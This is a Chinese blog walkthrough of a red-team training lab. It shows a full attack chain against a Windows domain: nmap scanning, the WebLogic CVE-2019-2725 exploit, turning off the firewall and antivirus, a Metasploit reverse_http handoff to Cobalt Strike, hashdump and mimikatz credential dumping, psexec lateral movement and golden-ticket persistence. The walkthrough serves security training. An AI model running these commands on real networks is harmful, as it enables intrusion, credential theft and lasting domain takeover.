ATT&CK红队评估实战靶场二

描述

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

靶场地址:漏洞详情

环境说明:10.10.10.1/24

DMZ网段:192.168.1.0/24

DC:10.10.10.10

WEB:10.10.10.80\192.168.1.8

PC:10.10.10.20\192.168.1.11

WEB机器开启WebLogic服务

C:\Oracle\Middleware\user_projects\domains\base_domain\bin 

startWebLogic---以管理员身份运行

b1be26f087a442d587fa5e80bfe7cd67.png

这个窗口不要关闭

fd482ad5d1d84e4da2ebfdcd1e7c9bc0.png

一、信息收集

扫描WEB主机

nmap -sV -T4 192.168.1.8

d294332d2d714a138d79aab3c6c7233d.png

访问80端口,是空白

访问7001端口,发现是WebLogic服务

a1531c503e1047188c37e8f8698ff41a.png

访问控制台:192.168.1.8:7001/console/login/LoginForm.jsp

尝试弱口令登录,被拒绝

dd4a2b156166432593779038493c02b7.png

WeblogicScan 扫描漏洞

发现CVE-2019-2725

537d82f2b31042fb88a53d5402e0325e.png

56ada560e2eb4cb486b7f4f369835803.png

先将防火墙和360关闭

9e533eb1909847478557c0acb4d83a2b.png

web主机存在两个网段

2cba1ebad01241aa851841449c6f4de3.png

上线CS

创建侦听

04ee0c52d20e4675a89dc3f13cf8da33.png

MSF转发会话

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.1.134
set lport 8855
set session 1

489cdc6a3c9f49f796d2aa1becc48593.png

33cd65c9755d46b3b7727f4dc9021d4f.png

CS收到会话

设置睡眠:sleep 1

6ff0ea243e0040d7962f0b325565ae40.png

提升权限

利用插件:MS14-058漏洞提升权限

74f03692fd0542c5a8408b7b797f9ccf.png

扫描端口

explore--port scan--选择10.10.10.0网段扫描

0b43da6c4df94f46b785684764b54f4a.png

发现三台内网主机

获取hash

hashdump           #获取hash

logonpasswords  #获取明文密码

2a6e32233d344f5e99c3e872b21fb59a.png

查看域控

关闭防火墙:netsh advfirewall set allprofiles state off
查看有几个域:net view /domain
查看域名:net config workstation
查看域内主机:net view
查询域内用户:net user /domain
查看域管理员:net group "domain admins" /domain  

d65dac62669c4b6daba701f9badc138c.png

使用CS自带功能,RunMinikatz获取hash和明文密码

创建SMB侦听器

name:自定义

payload:选择beacon SMB

save

Psexec

目标需要开放445端口和admin

上线DC

 选择de1ay\administrator账户

Listener选择刚才创建的SMB

session选择

上线DC

上线PC与上线DC步骤一致

权限维持

在域控获得KRBTGT账户NTLM密码哈希和SID,然后复制保存到记事本!

域名:de1ay.com

黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当失去域控权限时,内其他在通过域任意机器伪造票据重新获取最高权限。

WEB主机 Administrator账户权限-t>右键->Access->Golden Ticket

伪造成功

查看当前系统的票据:

mimikatz kerberos::list

可以访问域控

使用当前令牌登录PC

勾选Use session's current access token

参考:

ATT&CK实战系列——红队实战(二)-腾讯云开发者社区-腾讯云

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK红队评估(红日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值